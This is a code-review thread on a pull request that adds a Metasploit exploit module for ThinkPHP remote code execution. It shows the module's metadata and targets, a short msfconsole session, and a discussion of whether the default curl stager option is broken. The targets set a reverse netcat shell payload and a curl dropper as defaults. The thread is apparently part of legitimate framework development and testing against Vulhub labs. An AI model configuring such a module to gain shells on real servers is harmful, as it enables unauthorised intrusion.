modules/exploits/unix/webapp/thinkphp_rce.rb

```diff
@@ -0,0 +1,271 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                    => 'ThinkPHP Multiple PHP Injection RCEs',
+      'Description'             => %q{
+        This module exploits one of two PHP injection vulnerabilities in the
+        ThinkPHP web framework to execute code as the web user.
+
+        Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
+        vulnerable to a separate vulnerability. The module will automatically
+        attempt to detect the version of the software.
+
+        Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
+      },
+      'Author'                  => [
+        # Discovery by unknown threaty threat actors
+        'wvu' # Module
+      ],
+      'References'              => [
+        # https://www.google.com/search?q=thinkphp+rce, tbh
+        #['CVE', '2018-20062'],
+        #['CVE', '2019-9082'],
+        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],
+        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
+      ],
+      'DisclosureDate'          => '2018-12-10', # Unknown discovery date
+      'License'                 => MSF_LICENSE,
+      'Platform'                => ['unix', 'linux'],
+      'Arch'                    => [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Privileged'              => false,
+      'Targets'                 => [
+        ['Unix Command',
+          'Platform'            => 'unix',
+          'Arch'                => ARCH_CMD,
+          'Type'                => :unix_cmd,
+          'DefaultOptions'      => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
+        ],
+        ['Linux Dropper',
+          'Platform'            => 'linux',
+          'Arch'                => [ARCH_X86, ARCH_X64],
+          'Type'                => :linux_dropper,
+          'DefaultOptions'      => {
+            'CMDSTAGER::FLAVOR' => :curl, # Is this broken?
```

Comment:
Sorry, this meant the default option wasn't working for me. The `curl` stager was working fine, as was `bourne`.

I think it's fine that you removed the comment. The documentation sets the `curl` stager manually in the event I was wrong about the default option being broken. It's no big deal. This module works with a bunch of stagers.

Reply:
Yeah, it's broken, and it's not my config:

```
msf5 exploit(unix/webapp/thinkphp_rce) > set cmdstager::flavor
cmdstager::flavor => auto
msf5 exploit(unix/webapp/thinkphp_rce) > cat ~/.msf4/config
[*] exec: cat ~/.msf4/config

[framework/core]
LogLevel=3
VERBOSE=true

[framework/ui/console]

msf5 exploit(unix/webapp/thinkphp_rce) >
```

Reply:
Oh, it's https://github.com/rapid7/metasploit-framework/issues/12963.

Reply:
Resolved in #13242.